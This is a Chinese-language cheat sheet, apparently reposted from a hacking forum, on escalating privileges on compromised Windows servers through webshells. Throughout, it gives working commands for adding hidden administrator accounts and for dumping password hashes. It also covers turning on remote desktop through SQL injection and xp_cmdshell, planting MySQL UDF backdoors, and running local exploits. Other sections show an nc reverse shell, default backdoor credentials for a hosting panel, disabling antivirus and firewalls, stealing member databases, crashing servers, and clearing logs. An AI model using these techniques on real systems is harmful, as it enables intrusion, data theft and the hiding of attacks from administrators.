各種提權(quán)姿勢總結(jié)

時間：2023-06-30 15:51:01 | 來源：網(wǎng)站運營

時間：2023-06-30 15:51:01 來源：網(wǎng)站運營

各種提權(quán)姿勢總結(jié)：

提權(quán)技巧

---

1.cmd拒絕訪問就自己上傳一個cmd.exe，自己上傳的cmd是不限制后綴的，還可以是http://cmd.com cmd.txt cmd.rar等

http://2.net user不能執(zhí)行有時候是net.exe被刪除了，可以先試試net1，不行就自己上傳一個net.exe

3.cmd執(zhí)行exp沒回顯的解決方法：com路徑那里輸入exp路徑C:/RECYCLER/pr.exe，命令那里清空(包括/c )輸入net user jianmei daxia /add

4.有時候因為監(jiān)控而添加用戶失敗，試試上傳抓取hash的工具，如PwDump7.exe，得到hash之后可以進行破解，建議重定向結(jié)果到保存為1.txt

cmd /c c:/windows/temp/cookies/PwDump7.exe >1.txt，在條件允許的情況下也可以用mimikatz直接抓明文

5.有時候權(quán)限很松，很多命令都可以執(zhí)行，但是就是增加不上用戶，這時候你就要考慮是不是因為密碼過于簡單或是過于復雜了

6.用wt.asp掃出來的目錄，其中紅色的文件可以替換成exp，執(zhí)行命令時cmd那里輸入替換的文件路徑，下面清空雙引號加增加用戶的命令

7.有時候可以添加用戶，但是添加不到管理組，有可能是administrators組改名了，使用命令net user administrator查看管理組的名字

8.有的cmd執(zhí)行很變態(tài)，asp馬里，cmd路徑填上面，下面填："c:/xxx/exp.exe whoami” 記得前面加兩個雙引號，不行后面也兩個，不行就把exp的路徑放在cmd那里，下面不變

9.當添加不上用戶卻可以添加“增加用戶的Vbs、bat）的時候，就添加一個吧，然后用“直接使服務器藍屏重啟的東東”讓服務器重啟就提權(quán)成功

10.菜刀執(zhí)行的技巧，上傳cmd到可執(zhí)行目錄，右擊cmd 虛擬終端，help 然后setp c:/windows/temp/cmd.exe 設置終端路徑為：c:/windows/temp/cmd.exe

11.支持aspx但跨不了目錄的時候，可以上傳一個讀iis的vbs，執(zhí)行命令列出所有網(wǎng)站目錄，找到主站的目錄就可以跨過去了，上傳cscript.exe到可執(zhí)行目錄，

接著上傳iispwd.vbs到網(wǎng)站根目錄，cmd命令cmd /c “c:/windows/temp/cookies/cscript.exe” d:/web/iispwd.vbs

11.如何辨別服務器是不是內(nèi)網(wǎng)？192.168.x.x 172.16.x.x 10.x.x.x

12.安全狗下加用戶的語句：：for /l %i in (1,1,1000) do @net user test test [/add&@net]() localgroup administrators test /add

13.21對應的FTP、1433對應的MSSQL、3306對應的MYSQL、3389對應的遠程桌面、1521對應的Oracle、5631對應的pcanywhere

14.劫持提權(quán)，說到這個，想必肯定會想到lpk.dll這類工具，有時候在蛋疼怎么都加不上賬戶的時候，可以試試劫持shift、添加開機啟動等等思路

15.提權(quán)成功但3389端口沒開，執(zhí)行語句或是工具開3389失敗的時候，可以上傳rootkit.asp，登陸進去就是system權(quán)限，這時候再嘗試開3389希望較大

常用DOS命令

---

查看版本：ver

查看權(quán)限：whoami

查看配置：systeminfo

查看用戶：net user

查看進程：tasklist

查看正在運行的服務：tasklist /svc

查看開放的所有端口：netstat -ano

查詢管理用戶名：query user

查看搭建環(huán)境：ftp 127.0.0.1

查看指定服務的路徑：sc qc Mysql

添加一個用戶：net user jianmei daxia.asd /add

提升到管理權(quán)限：net localgroup administrators jianmei /add

添加用戶并提升權(quán)限：net user jianmei daxia.asd /add & net localgroup administrators jianmei /add

查看制定用戶信息：net user jianmei

查看所有管理權(quán)限的用戶：net localgroup administrators

加入遠程桌面用戶組：net localgroup “Remote Desktop Users” jianmei /add

突破最杭州接數(shù)：mstsc /admin /v:127.0.0.1

刪除用戶：net user jianmei /del

刪除管理員賬戶:net user administrator daxia.asd

更改系統(tǒng)登陸密碼：net password daxia.asd

激活GUEST用戶：net user guest /active:yes

開啟TELNET服務：net start telnet

關(guān)閉麥咖啡：net stop “McAfee McShield”

關(guān)閉防火墻：net stop sharedaccess

查看當前目錄的所有文件：dir c:/windows/

查看制定文件的內(nèi)容：type c:/windows/1.asp

把cmd.exe復制到c:/windows的temp目錄下并命名為cmd.txt：copy c:/windows/temp/cookies/cmd.exe c:/windows/temp/cmd.txt

開3389端口的命令：REG ADD HKLM/SYSTEM/CurrentControlSet/Control/Terminal” “Server /v fDenyTSConnections /t REG_DWORD /d 0 /f

查看補?。?code>dir c:/windows/>a.txt&(for %i in (KB952004.log KB956572.log KB2393802.log KB2503665.log KB2592799.log KB2621440.log KB2160329.log KB970483.log KB2124261.log KB977165.log KB958644.log) do @type [a.txt|@find](mailto:a.txt%7C@find) /i [“%i”||@echo](mailto:%E2%80%9C%i%E2%80%9D%7C%7C@echo)%i Not Installed!)&del /f /q /a a.txt

常見殺軟

---

360tray.exe 360實時保護

ZhuDongFangYu.exe 360主動防御

KSafeTray.exe 金山衛(wèi)士

McAfee McShield.exe 麥咖啡

SafeDogUpdateCenter.exe 服務器安全狗

windows提權(quán)中敏感目錄和敏感注冊表的利用

---

提權(quán)中的敏感注冊表位置

---

SQL語句直接開啟3389

---

3389登陸關(guān)鍵注冊表位置：HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/TerminalServer/DenyTSConnections

其中鍵值DenyTSConnections 直接控制著3389的開啟和關(guān)閉，當該鍵值為0表示3389開啟，1則表示關(guān)閉。

而MSSQL的xp_regwrite的存儲過程可以對注冊進行修改，我們使用這點就可以簡單的修改DenyTSConnections鍵值，從而控制3389的關(guān)閉和開啟。

開啟3389的SQL語句： syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM/CurrentControlSet/Control/TerminalServer’,'fDenyTSConnections’,'REG_DWORD’,0;–

關(guān)閉3389的SQL語句：syue.com/xiaohua.asp?id=100;exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM/CurrentControlSet/Control/TerminalServer’,'fDenyTSConnections’,'REG_DWORD’,1;–

2003可以實現(xiàn)一句話開3389：reg add “HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp” /v PortNumber /t REG_DWORD /d 80 /f

wscript.shell的刪除和恢復

---

卸載wscript.shell對象，在cmd下或直接運行：regsvr32 /u %windir%/system32/WSHom.Ocx

卸載FSO對象，在cmd下或直接運行：regsvr32.exe /u %windir%/system32/scrrun.dll

卸載stream對象，在cmd下或直接運行：regsvr32 /s /u “C:/ProgramFiles/CommonFiles/System/ado/msado15.dll” 如果想恢復的話只需要去掉/U 即可重新再注冊以上相關(guān)ASP組件，這樣子就可以用了

如何找到準確的終端連接端口？

---

在aspx大馬里，點擊“系統(tǒng)信息”第三個就是目前的3389端口

或是執(zhí)行命令查看正在運行的服務：tasklist /svc

找到：svchost.exe 1688 TermService

記住1688這個ID值，查看開放的所有端口：netstat -ano

找到1688這個ID值所對應的端口就是3389目前的端口

iis6提權(quán)提示Can not find wmiprvse.exe的突破方法

---

突破方法一：

在IIS環(huán)境下，如果權(quán)限做得不嚴格，我們在aspx大馬里面是有權(quán)限直接結(jié)束wmiprvse.exe進程的，進程查看里面直接K掉

在結(jié)束之后，它會再次運行，這時候的PID值的不一樣的，這時候我們回來去運行exp，直接秒殺。

突破方法二：

虛擬主機，一般權(quán)限嚴格限制的，是沒權(quán)限結(jié)束的，這時候我們可以考慮配合其他溢出工具讓服務器強制重啟，比如“直接使服務器藍屏重啟的東東”

甚至可以暴力點，DDOS秒殺之，管理發(fā)現(xiàn)服務器不通了首先肯定是以為服務器死機，等他重啟下服務器（哪怕是IIS重啟下）同樣秒殺之。

本地溢出提權(quán)

---

計算機有個地方叫緩存區(qū),程序的緩存區(qū)長度是被事先設定好的,如果用戶輸入的數(shù)據(jù)超過了這個緩存區(qū)的長度,那么這個程序就會溢出了.

緩存區(qū)溢出漏洞主要是由于許多軟件沒有對緩存區(qū)檢查而造成的.

利用一些現(xiàn)成的造成溢出漏洞的exploit通過運行,把用戶從users組或其它系統(tǒng)用戶中提升到administrators組.

想要執(zhí)行cmd命令，就要wscript.shell組建支持，或是支持aspx腳本也行，因為aspx腳本能調(diào)用.net組件來執(zhí)行cmd的命令.

Mssql提權(quán)

---

掃描開放的端口，1433開了就可以找sa密碼提權(quán)，用大馬里的搜索文件功能，sa密碼一般在conn.asp config.asp web.config 這三個文件

也可以通過注冊表找配置文件，看下支持aspx不，支持的話跨目錄到別的站點上找，找到之后用aspshell自帶的sql提權(quán)登錄再執(zhí)行命令創(chuàng)建用戶即可。

aspx馬提權(quán)執(zhí)行命令有點不一樣，點擊數(shù)據(jù)庫管理–選MSSQL–server=localhost;UID=sa;PWD=;database=master;Provider=SQLOLEDB–輸入帳號密碼連接即可

增加一個用戶：exec master.dbo.xp_cmdshell ‘net user jianmei daxia.asd /add’;–

提升為管理員：exec master.dbo.xp_cmdshell ‘net localgroup administrators jianmei /add’;–

PS:如果增加不上，說明是xp_cmdshell組建沒有，

增加xp_cmdshell組建命令：Use master dbcc addextendedproc(‘xp_cmdshell’,'xplog70.dll’)

1433一句話開3389： Exec master.dbo.xp_regwrite’HKEY_LOCAL_MACHINE’,'SYSTEM/CurrentControlSet/Control/Terminal Server’,'fDenyTSConnections’,'REG_DWORD’,0;–

mysql提權(quán)

---

利用mysql提權(quán)的前提就是,服務器安裝了mysql，mysql的服務沒有降權(quán)，是默認安裝以系統(tǒng)權(quán)限繼承的(system權(quán)限).并且獲得了root的賬號密碼

如何判斷一臺windows服務器上的mysql有沒有降權(quán)？ cmd命令net user 如果存在 mysql mssql這樣用戶或者類似的.通常就是它的mssql mysql服務已經(jīng)被降權(quán)運行了

如何判斷服務器上是否開啟了mysql服務？ 開了3306端口，有的管理員會把默認端口改掉.另一個判斷方法就是網(wǎng)站是否支持php,一般支持的話都是用mysql數(shù)據(jù)庫的.

如何查看root密碼？ 在mysql的安裝目錄下找到user.myd這個文件，連接信息就在里面，一般是40位cmd加密，一些php網(wǎng)站安裝的時候用的是root用戶，在conn.asp config.asp這

些文件里，可以用PHP腳本的文件搜索功能搜索這兩個文件，找到之后編輯就可以找到連接信息，有時會顯得很亂，這時就需要自己去組合，前17位在第一行可以

找到，還有23位在第三行或是其他行，自己繼續(xù)找。

可以直接用php腳本里“mysql執(zhí)行”，或是上傳個UDF.php，如果網(wǎng)站不支持PHP，可以去旁一個php的站，也可以把UDF.php上傳到別的phpshell上也可以。

填入帳號密碼之后，自然就是安裝DLL了，點擊“自動安裝Mysql BackDoor” 顯示導出跟創(chuàng)建函數(shù)成功后，緊接著執(zhí)行增加用戶的命令即可。

PS：5.0版本以下(包括5.0的)默認c:/windows/系統(tǒng)目錄就可以了，5.1版本以上的不能導出到系統(tǒng)目錄下創(chuàng)建自定義函數(shù)，只能導出在mysql安裝目錄下的

lib/plugin目錄中，例如：D:/Program Files/MySQL/MySQL Server 5.1/lib/plugin/mysql.dll

serv-u提權(quán)

---

這個文件里包含serv-u的md5密碼：C:/Program Files/RhinoSoft.com/Serv-U//ServUDaemon.ini

找到這個文件：ServUDaemon.ini 打開找到：LocalSetupPassword=nqFCE64E0056362E8FCAF813094EC39BC2

再拿md5密文去解密，再用現(xiàn)在的密碼登陸提權(quán)即可。

serv-u提權(quán)的前提是43958端口開了，且知道帳號密碼！

如果帳號密碼默認，直接用shell里面的serv-u提權(quán)功能即可搞定，建議用aspx馬、php馬去提權(quán)，因為可以看回顯。

530說明密碼不是默認的,回顯330說明成功，900說明密碼是默認的

在程序里找個快捷方式，或是相關(guān)的文件進行下載到本地，再查看文件的屬性，就可以找到serv-u的安裝目錄了。

端口轉(zhuǎn)發(fā)

---

什么情況下適合轉(zhuǎn)發(fā)端口？

1.服務器是內(nèi)網(wǎng)，我們無法連接。

2.服務器上有防火墻，阻斷我們的連接。

轉(zhuǎn)發(fā)端口的前提，我們是外網(wǎng)或是有外網(wǎng)服務器。

找個可讀可寫目錄上傳lcx.exe

本地cmd命令：lcx.exe -listen 1988 4567 （監(jiān)聽本地1988端口并轉(zhuǎn)發(fā)到4567端口）

接著shell命令：cmd /c c:/windows/temp/cookies/lcx.exe -slave 本機ip 1988 服務器ip 3389 （把服務器3389端口轉(zhuǎn)發(fā)到本地4567端口）

之后本地連接：127.0.0.1:4567 (如果不想加上:4567的話，本地執(zhí)行命令的時候，把4567換成3389來執(zhí)行就行了)

以上是本機外網(wǎng)情況下操作，接著說下在外網(wǎng)服務器里如何操作：

上傳lxc.exe cmd.exe到服務器且同一目錄，執(zhí)行cmd.exe命令：lcx.exe -listen 1988 4567

接著在aspx shell里點擊端口映射，遠程ip改為站點的ip，遠端口程填1988，點擊映射端口，接著在服務器里連接127.0.0.1:4567就可以了。

NC反彈提權(quán)

---

當可以執(zhí)行net user，但是不能建立用戶時，就可以用NC反彈提權(quán)試下，特別是內(nèi)網(wǎng)服務器，最好用NC反彈提權(quán)。

不過這種方法, 只要對方裝了防火墻, 或是屏蔽掉了除常用的那幾個端口外的所有端口，那么這種方法也失效了….

找個可讀可寫目錄上傳nc.exe cmd.exe

-l 監(jiān)聽本地入棧信息

-p port打開本地端口

-t 以telnet形式應答入棧請求

-e 程序重定向

本地cmd執(zhí)行：nc -vv -l -p 52進行反彈

接著在shell里執(zhí)行命令：c:/windows/temp/nc.exe -vv 服務器ip 999 -e c:/windows/temp/cmd.exe最好是80或8080這樣的端口，被防火墻攔截的幾率小很多

執(zhí)行成功后本地cmd命令：cd/ （只是習慣而已）

接著以telnet命令連接服務器：telnet 服務器ip 999

回車出現(xiàn)已選定服務器的ip就說明成功了，接著權(quán)限比較大了，嘗試建立用戶！

PS：一般這樣的格式執(zhí)行成功率很小，不如直接在cmd那里輸入：c:/windows/temp/nc.exe 命令這里輸入：-vv 服務器ip 999 -e c:/windows/temp/cmd.exe

這個技巧成功率比上面那個大多了，不單單是nc可以這樣，pr這些提權(quán)exp也是可以的

星外提權(quán)

---

如何知道是不是星外主機？

第一：網(wǎng)站物理路徑存在“freehost”

第二：asp馬里點擊程序，存在“7i24虛擬主機管理平臺”“星外主機”之類的文件夾

默認帳號：freehostrunat 默認密碼：fa41328538d7be36e83ae91a78a1b16f!7

freehostrunat這個用戶是安裝星外時自動建立的，已屬于administrators管理組，而且密碼不需要解密，直接登錄服務器即可

（ee.exe提權(quán)法）

找個可讀可寫目錄上傳ee.exe

cmd命令：/c c:/windows/temp/cookies/ee.exe -i（獲取星外帳號的id值，例如回顯：FreeHost ID：724）

接著命令：/c c:/windows/temp/cookies/ee.exe -u 724 （獲取星外的帳號密碼）

（vbs提權(quán)法）

找個可讀可寫目錄上傳cscript.exe和iispwd.vbs

cmd執(zhí)行：/c “c:/windows/temp/cookies/cscript.exe” c:/windows/temp/cookies/iispwd.vbs

意思是讀取iis，這樣一來，不但可以獲取星外的帳號密碼，還可以看到同服務器上的所有站點的目錄

360提權(quán)

---

找個可讀可寫目錄上傳360.exe

cmd命令：/c c:/windows/temp/cookies/360.exe

會提示3段英文： 360 Antivirus Privilege Escalation Exploit By friddy 2010.2.2 You will get a Shift5 door! Shift5 Backdoor created! 這是成功的征兆，接著連接服務器連按5下shift鍵，將彈出任務管理器，點擊新建任務：explorer.exe 會出現(xiàn)桌面，接下來大家都會弄了……

華眾虛擬主機提權(quán)

---

就經(jīng)驗來說，一般溢出提權(quán)對虛擬主機是無果的，而且華眾又沒有星外那么明顯的漏洞

所以華眾提權(quán)關(guān)鍵之處就是搜集信息，主要注冊表位置：

HKEY_LOCAL_MACHINE/SOFTWARE/HZHOST/CONFIG/ HKEY_LOCAL_MACHINE/software/hzhost/config/settings/mysqlpass root密碼

HKEY_LOCAL_MACHINE/software/hzhost/config/settings/mssqlpss sa 密碼

c:/windows/temp 下有hzhost主機留下的ftp登陸記錄有用戶名和密碼

以上信息配合hzhosts華眾虛擬主機系統(tǒng)6.x 破解數(shù)據(jù)庫密碼工具使用

百度搜索：hzhosts華眾虛擬主機系統(tǒng)6.x 破解數(shù)據(jù)庫密碼工具

脫庫

---

Access數(shù)據(jù)庫脫庫很簡單，直接下載數(shù)據(jù)庫即可，mssql數(shù)據(jù)庫可以用shell自帶的脫褲功能，找到數(shù)據(jù)庫的連接信息，一般在web.config.asp里，然后連接一

下SA，找到會員表（UserInfo）就可以了。

mysql數(shù)據(jù)庫脫庫，找到root帳號密碼，用PHP大馬自己帶鏈接功能連接一下，也自己自己上傳PHP脫褲腳本，之后找到目標數(shù)據(jù)庫（數(shù)據(jù)庫名），再找到會員表

menber進行脫褲即可。

服務器安全

---

命令提示符已被系統(tǒng)管理員停用？ 解決方法：運行→gpedit.msc→用戶配置→管理模板→系統(tǒng)，在右側(cè)找到”阻止命令提示符”, 然后雙擊一下,在”設置”里面選中”未配置” ,最后點擊”確定”。

如何判斷服務器的類型？ 解決方法：直接ping服務器ip，看回顯信息進行判斷

TTL=32 9X/ME

TTL=64 linux

TTL=128 2000X/XP

TTL=255 UNIX

為什么有時3389開放卻不能連接？ 原因分析：有時候是因為防火墻，把3389轉(zhuǎn)發(fā)到其他端口就可以連接了，有的轉(zhuǎn)發(fā)后依然是連接不上，那是因為管理員在TCP/IP里設置的端口限制 解決方法：我們需要把端口轉(zhuǎn)為TCP/IP里設置的只允許連接的端口其中一個就可以了，更好的辦法是取消端口限制。

最簡單的往服務器上傳東西方法是什么？ 本機打開“HFS網(wǎng)絡文件服務器”這款工具，把需要上傳的工具直接拖進左邊第一個框內(nèi)，復制上面的地址，到服務器里的瀏覽器訪問，就可以下載了

限制“命令提示符”的運行權(quán)限？ 我的電腦（右鍵）–資源管理器中–點擊“工具”按鈕，選擇“文件夾選項”，切換到“查看”標簽，去掉“使用簡單文件共享(推薦)”前面的鉤，這一步是為

了讓文件的屬性菜單中顯示“安全”標簽，然后進入“c:/windows/system32/”，找到“cmd.exe”，點右鍵選擇“屬性”，切換到“安全”標簽，將其中“組

或用戶名稱”中除了管理員外的所有用戶都刪除，完成后點“確定”這樣當普通用戶想運行“命令提示符”的時候?qū)霈F(xiàn)“拒絕訪問”的警告框。

如何更改windows2003最杭州接數(shù)？ windows2003中的遠程桌面功能非常方便，但是初始設置只允許2個用戶同時登陸，有些時候因為我在公司連接登陸后斷開，同事在家里用其他用戶登陸后斷開，

當我再進行連接的時候，總是報錯“終端服務超過最杭州接數(shù)”這時候我和同事都不能登陸，通過以下方法來增加連接數(shù)，運行：services.msc，啟用license

logging，別忘了添加完畢后再關(guān)閉 License Logging 打開win2k3的控制面板中的“授權(quán)”，點“添加許可”輸入要改的連接數(shù)

如何清除服務器里的IP記錄日志？

1.我的電腦右鍵管理–事件查看器–安全性–右鍵清除所有事件

2.打開我的電腦–C盤–WINDOWS–system32–config–AppEvent.Evt屬性–安全–全部都拒絕

3.Klaklog.evt屬性–安全–全部都拒絕–SecEvent.Tvt屬性–安全–全部都拒絕